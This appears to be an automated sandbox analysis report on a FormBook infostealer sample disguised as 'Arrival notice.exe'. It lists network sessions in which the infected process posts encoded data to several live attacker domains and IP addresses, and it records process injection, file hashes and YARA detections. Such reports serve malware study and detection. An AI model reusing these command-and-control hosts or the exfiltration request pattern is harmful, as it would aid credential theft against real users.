                                                                  User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) CriOS/43.0.2357.51 Mobile/11D167 Safari/9537.53
                                                                  Data Ascii: EZ2lo=[TRUNCATED]


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  28 | 192.168.2.10 | 50004 | 203.175.9.128 | 80 | 6332 | C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Oct 7, 2024 10:40:25.039671898 CEST | 516 | OUT | GET /ztx6/?7NP=7FXXUPl&EZ2lo=LeaXBPgHi5cWzf7BLXmmPavQOKPWjuOHHJU4/JhL5/erYoJhFK0RVrM4N1v7oJ6CU0UsWYV2IqVksZKiICMv/g8AZCcinNpV5w5CDvgP9QHPdQNWgQ== HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Connection: close
                                                                  Host: www.animekuid.xyz
                                                                  User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) CriOS/43.0.2357.51 Mobile/11D167 Safari/9537.53
                                                                  Oct 7, 2024 10:40:26.444962978 CEST | 515 | IN | HTTP/1.1 301 Moved Permanently
                                                                  Date: Mon, 07 Oct 2024 08:40:25 GMT
                                                                  Server: Apache
                                                                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                  Cache-Control: no-cache, must-revalidate, max-age=0
                                                                  X-Redirect-By: WordPress
                                                                  Upgrade: h2,h2c
                                                                  Connection: Upgrade, close
                                                                  Location: http://animekuid.xyz/ztx6/?7NP=7FXXUPl&EZ2lo=LeaXBPgHi5cWzf7BLXmmPavQOKPWjuOHHJU4/JhL5/erYoJhFK0RVrM4N1v7oJ6CU0UsWYV2IqVksZKiICMv/g8AZCcinNpV5w5CDvgP9QHPdQNWgQ==
                                                                  Vary: Accept-Encoding
                                                                  Transfer-Encoding: chunked
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Oct 7, 2024 10:40:26.456265926 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  29 | 192.168.2.10 | 50005 | 38.47.233.65 | 80 | 6332 | C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Oct 7, 2024 10:40:31.763179064 CEST | 770 | OUT | POST /kpvx/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Content-Length: 194
                                                                  Cache-Control: no-cache
                                                                  Connection: close
                                                                  Host: www.nng65.top
                                                                  Origin: http://www.nng65.top
                                                                  Referer: http://www.nng65.top/kpvx/
                                                                  User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) CriOS/43.0.2357.51 Mobile/11D167 Safari/9537.53
                                                                  Data Ascii: EZ2lo=nXN4t1Aj4WD6Jb1aeGzIVAmIuqIRwVT0FA2fehpktXnozHhKw3loxylTHnzow/fwRtIJT1wBkqBKK48b6rDLsvoryK2TjU+igqwVlrFegGhh3pUYwLzo8QvH7tCEI8S9lJFQzu8+4CHdSmTet7ey6RtQUOBOcAE9YSmHClPaoQgMcs70R2se4gtCWezm
                                                                  Oct 7, 2024 10:40:32.606268883 CEST | 289 | IN | HTTP/1.1 404 Not Found
                                                                  Server: nginx
                                                                  Date: Mon, 07 Oct 2024 08:40:32 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 146
                                                                  Connection: close
                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  30 | 192.168.2.10 | 50006 | 38.47.233.65 | 80 | 6332 | C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Oct 7, 2024 10:40:34.450180054 CEST | 794 | OUT | POST /kpvx/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Content-Length: 218
                                                                  Cache-Control: no-cache
                                                                  Connection: close
                                                                  Host: www.nng65.top
                                                                  Origin: http://www.nng65.top
                                                                  Referer: http://www.nng65.top/kpvx/
                                                                  User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) CriOS/43.0.2357.51 Mobile/11D167 Safari/9537.53
                                                                  Data Ascii: EZ2lo=nXN4t1Aj4WD6J6FaOVbICwmPy6IR61T4FAqfekQpslzoziNKx2lo8SlTJHzt+ff5RtE7TwwBkqFKK5Mb6YrKt/pN0K2V8E+igqwVlrRngG5h36cYi5X3xwvAsdCEe8S5lJEFzq0A4APdSmDetqexgBtsauAFdh1VQXSGMDCXwGkZbNazAnNJrXxMYYGM8BRsMMC5qPKFWmCRP3lwEA==
                                                                  Oct 7, 2024 10:40:35.344913006 CEST | 289 | IN | HTTP/1.1 404 Not Found
                                                                  Server: nginx
                                                                  Date: Mon, 07 Oct 2024 08:40:35 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 146
                                                                  Connection: close
                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  31 | 192.168.2.10 | 50007 | 38.47.233.65 | 80 | 6332 | C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Oct 7, 2024 10:40:37.078308105 CEST | 1807 | OUT | POST /kpvx/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Content-Length: 1230
                                                                  Cache-Control: no-cache
                                                                  Connection: close
                                                                  Host: www.nng65.top
                                                                  Origin: http://www.nng65.top
                                                                  Referer: http://www.nng65.top/kpvx/
                                                                  User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) CriOS/43.0.2357.51 Mobile/11D167 Safari/9537.53
                                                                  Oct 7, 2024 10:40:37.913081884 CEST | 289 | IN | HTTP/1.1 404 Not Found
                                                                  Server: nginx
                                                                  Date: Mon, 07 Oct 2024 08:40:37 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 146
                                                                  Connection: close
                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  32 | 192.168.2.10 | 50008 | 38.47.233.65 | 80 | 6332 | C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Oct 7, 2024 10:40:39.618515015 CEST | 512 | OUT | GET /kpvx/?EZ2lo=qVlYuFMRm0T/H/1dN1vNUTygvewP5xPIMi2tCBBBqVz46ihG+FVn/BxKK2Kq0cGJXf1CUDwOjcd0Kop00bnWlMV60J7u8mOEgagA5oNjn1tN0dkAzg==&7NP=7FXXUPl HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Connection: close
                                                                  Host: www.nng65.top
                                                                  User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) CriOS/43.0.2357.51 Mobile/11D167 Safari/9537.53
                                                                  Oct 7, 2024 10:40:40.523669958 CEST | 289 | IN | HTTP/1.1 404 Not Found
                                                                  Server: nginx
                                                                  Date: Mon, 07 Oct 2024 08:40:40 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 146
                                                                  Connection: close
                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  33 | 192.168.2.10 | 50009 | 172.81.61.224 | 80 | 6332 | C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Oct 7, 2024 10:40:45.573451996 CEST | 788 | OUT | POST /vjif/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Content-Length: 194
                                                                  Cache-Control: no-cache
                                                                  Connection: close
                                                                  Host: www.moritynomxd.xyz
                                                                  Origin: http://www.moritynomxd.xyz
                                                                  Referer: http://www.moritynomxd.xyz/vjif/
                                                                  User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) CriOS/43.0.2357.51 Mobile/11D167 Safari/9537.53
                                                                  Data Ascii: EZ2lo=sjFacnSUxL2BU4RMkR+LGLOmML7tFulu9enSSBzHtgJ1N2QuOeSDeMiEzUzsxQ7DgaQrB9zYzG1NRKGuivPT5lRJISA4M5Ij+f8YabTOlN+H9SgLpP5OJ5zU2N99ltWqj27AigTwzN3+EIFWTVfsI4SrbMUqZ6jcISHd/TasO303+pnrk/toaxqJAUX0


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  34 | 192.168.2.10 | 50010 | 172.81.61.224 | 80 | 6332 | C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Oct 7, 2024 10:40:48.117775917 CEST | 812 | OUT | POST /vjif/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Content-Length: 218
                                                                  Cache-Control: no-cache
                                                                  Connection: close
                                                                  Host: www.moritynomxd.xyz
                                                                  Origin: http://www.moritynomxd.xyz
                                                                  Referer: http://www.moritynomxd.xyz/vjif/
                                                                  User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) CriOS/43.0.2357.51 Mobile/11D167 Safari/9537.53
                                                                  Data Ascii: EZ2lo=sjFacnSUxL2BFrJM3g+LT7OhAr7tfeli9fbSSA2KtWR1MTsuNfSDfMiE40zt+w72gaMZB/3YzGxNROCuic3Q51RLdiA6UZIj+f8YabXklN2H9hoLorlNAZzVh999htWuj26nilLKzIr+EMJWTn3tH4StVsVjS/+pFATHwFCMUwER9IGs1uM/JG2HOSieWSimPEIP4qjqGfBBm2D4ZQ==


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  35 | 192.168.2.10 | 50011 | 172.81.61.224 | 80 | 6332 | C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Oct 7, 2024 10:40:50.670505047 CEST | 1825 | OUT | POST /vjif/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Content-Length: 1230
                                                                  Cache-Control: no-cache
                                                                  Connection: close
                                                                  Host: www.moritynomxd.xyz
                                                                  Origin: http://www.moritynomxd.xyz
                                                                  Referer: http://www.moritynomxd.xyz/vjif/
                                                                  User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) CriOS/43.0.2357.51 Mobile/11D167 Safari/9537.53


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  36 | 192.168.2.10 | 50012 | 172.81.61.224 | 80 | 6332 | C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Oct 7, 2024 10:40:53.214644909 CEST | 518 | OUT | GET /vjif/?7NP=7FXXUPl&EZ2lo=hht6fXzVtrW5d+NPng+JG5iJCe7TavNe5+XwDzPis3heMTZrctTYWOKh4nmo+xDjprJSB+HPmC1WRNqnme2dwnVwPjNhKroV7fgYGIXE7NS2qGE/9Q== HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Connection: close
                                                                  Host: www.moritynomxd.xyz
                                                                  User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) CriOS/43.0.2357.51 Mobile/11D167 Safari/9537.53


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  37 | 192.168.2.10 | 50013 | 194.58.112.174 | 80 | 6332 | C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Oct 7, 2024 10:41:19.722125053 CEST | 800 | OUT | POST /1yii/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Content-Length: 194
                                                                  Cache-Control: no-cache
                                                                  Connection: close
                                                                  Host: www.albero-dveri.online
                                                                  Origin: http://www.albero-dveri.online
                                                                  Referer: http://www.albero-dveri.online/1yii/
                                                                  User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) CriOS/43.0.2357.51 Mobile/11D167 Safari/9537.53
                                                                  Data Ascii: EZ2lo=f5UW3vFaRJupowyWvUtiX8aNrDNpsAVlYwcOtHSavLdAPlcWO4NhVirSoHvu6SIC4GcpE+UOTiTvqdSCgj9jiLiajObLrKpzElP6hGcCek3TFz9iSDps2hAJPSgO48niWPCTdKT0lXLiKCJg7IQnu9fKQyTDqDG3xIAJLyU3YBnKtvNQsg9MDKNHUbLC
                                                                  Oct 7, 2024 10:41:20.404263973 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                                  Server: nginx
                                                                  Date: Mon, 07 Oct 2024 08:41:20 GMT
                                                                  Content-Type: text/html
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Content-Encoding: gzip


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  38 | 192.168.2.10 | 50014 | 194.58.112.174 | 80 | 6332 | C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Oct 7, 2024 10:41:22.261383057 CEST | 824 | OUT | POST /1yii/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Content-Length: 218
                                                                  Cache-Control: no-cache
                                                                  Connection: close
                                                                  Host: www.albero-dveri.online
                                                                  Origin: http://www.albero-dveri.online
                                                                  Referer: http://www.albero-dveri.online/1yii/
                                                                  User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) CriOS/43.0.2357.51 Mobile/11D167 Safari/9537.53
                                                                  Data Ascii: EZ2lo=f5UW3vFaRJupyT6WjVtiGMaKyDNpngVhYwQOtGmKve1AOEsWN5NhbCrSgnvh3yI/4GYbE/oOTiXvqcOCgwFgibiY4+bJlqpzElP6hGJnekvTFCNiDWVr1hAIKSgOuMnmWPD2dLPelVjiKD5g15Qgn9fMeSSg7Dvw5ocsRhAMITGquOsX9xcbQ9RJad+oPZWKRKwmNjb/9QLfZ/SB9g==
                                                                  Oct 7, 2024 10:41:22.943185091 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                                  Server: nginx
                                                                  Date: Mon, 07 Oct 2024 08:41:22 GMT
                                                                  Content-Type: text/html
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Content-Encoding: gzip


                                                                  Session ID:39
                                                                  Source IP:192.168.2.10
                                                                  Source Port:50015
                                                                  Destination IP:194.58.112.174
                                                                  Destination Port:80
                                                                  PID:6332
                                                                  Process:C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Oct 7, 2024 10:41:24.806813002 CEST | 1837 | OUT | POST /1yii/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Content-Length: 1230
                                                                  Cache-Control: no-cache
                                                                  Connection: close
                                                                  Host: www.albero-dveri.online
                                                                  Origin: http://www.albero-dveri.online
                                                                  Referer: http://www.albero-dveri.online/1yii/
                                                                  User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) CriOS/43.0.2357.51 Mobile/11D167 Safari/9537.53
                                                                  Oct 7, 2024 10:41:25.484146118 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                                  Server: nginx
                                                                  Date: Mon, 07 Oct 2024 08:41:25 GMT
                                                                  Content-Type: text/html
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Content-Encoding: gzip


                                                                  Session ID:40
                                                                  Source IP:192.168.2.10
                                                                  Source Port:50016
                                                                  Destination IP:194.58.112.174
                                                                  Destination Port:80
                                                                  PID:6332
                                                                  Process:C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Oct 7, 2024 10:41:27.351933002 CEST | 522 | OUT | GET /1yii/?EZ2lo=S7820Y1cJZfxr22K40lVRI+qrmhalVt3Xj4gyHqd7MQTNmhmHaxoWGfNrnng7EIbxAFiJvsMf3T0ofXi1SEumpqeoP3XzrB7Dn3j9lk1UX6QYnk/Rw==&7NP=7FXXUPl HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Connection: close
                                                                  Host: www.albero-dveri.online
                                                                  User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) CriOS/43.0.2357.51 Mobile/11D167 Safari/9537.53
                                                                  Oct 7, 2024 10:41:28.052274942 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                                  Server: nginx
                                                                  Date: Mon, 07 Oct 2024 08:41:27 GMT
                                                                  Content-Type: text/html
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close


                                                                  Session ID:41
                                                                  Source IP:192.168.2.10
                                                                  Source Port:50017
                                                                  Destination IP:3.33.130.190
                                                                  Destination Port:80
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Oct 7, 2024 10:41:35.274629116 CEST | 806 | OUT | POST /nkwh/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Content-Length: 194
                                                                  Cache-Control: no-cache
                                                                  Connection: close
                                                                  Host: www.platinumkitchens.info
                                                                  Origin: http://www.platinumkitchens.info
                                                                  Referer: http://www.platinumkitchens.info/nkwh/
                                                                  User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) CriOS/43.0.2357.51 Mobile/11D167 Safari/9537.53


                                                                  Target ID:2
                                                                  Start time:04:37:25
                                                                  Start date:07/10/2024
                                                                  Path:C:\Users\user\Desktop\Arrival notice.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Users\user\Desktop\Arrival notice.exe"
                                                                  Imagebase:0x400000
                                                                  File size:1'401'539 bytes
                                                                  MD5 hash:50397BFAB2624CCCB8C7AE8CE667048C
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:low
                                                                  Has exited:true

                                                                  Target ID:9
                                                                  Start time:04:37:31
                                                                  Start date:07/10/2024
                                                                  Path:C:\Windows\SysWOW64\svchost.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Users\user\Desktop\Arrival notice.exe"
                                                                  Imagebase:0xf10000
                                                                  File size:46'504 bytes
                                                                  MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.1730283884.0000000008C00000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.1730283884.0000000008C00000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.1724645368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.1724645368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.1725426506.0000000004390000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.1725426506.0000000004390000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:11
                                                                  Start time:04:38:01
                                                                  Start date:07/10/2024
                                                                  Path:C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exe"
                                                                  Imagebase:0xae0000
                                                                  File size:140'800 bytes
                                                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.3758373668.0000000009130000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000002.3758373668.0000000009130000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.3750353258.0000000003960000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000002.3750353258.0000000003960000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                  Reputation:high
                                                                  Has exited:false

                                                                  Target ID:12
                                                                  Start time:04:38:04
                                                                  Start date:07/10/2024
                                                                  Path:C:\Windows\SysWOW64\mobsync.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Windows\SysWOW64\mobsync.exe"
                                                                  Imagebase:0x8f0000
                                                                  File size:93'696 bytes
                                                                  MD5 hash:F7114D05B442F103BD2D3E20E78A7AA5
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.3747714326.0000000002D10000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000C.00000002.3747714326.0000000002D10000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.3741834326.00000000007E0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000C.00000002.3741834326.00000000007E0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.3746700176.0000000002CC0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000C.00000002.3746700176.0000000002CC0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                  Reputation:low
                                                                  Has exited:false

                                                                  Target ID:17
                                                                  Start time:04:38:30
                                                                  Start date:07/10/2024
                                                                  Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                  Imagebase:0x7ff613480000
                                                                  File size:676'768 bytes
                                                                  MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true


                                                                    Execution Graph

                                                                    Execution Coverage:1.4%
                                                                    Dynamic/Decrypted Code Coverage:4.7%
                                                                    Signature Coverage:13.3%
                                                                    Total number of Nodes:128
                                                                    Total number of Limit Nodes:9

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1724645368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_400000_svchost.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: VUUU$gfff
                                                                    • API String ID: 0-2662692612

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    Strings
                                                                    Memory Dump Source
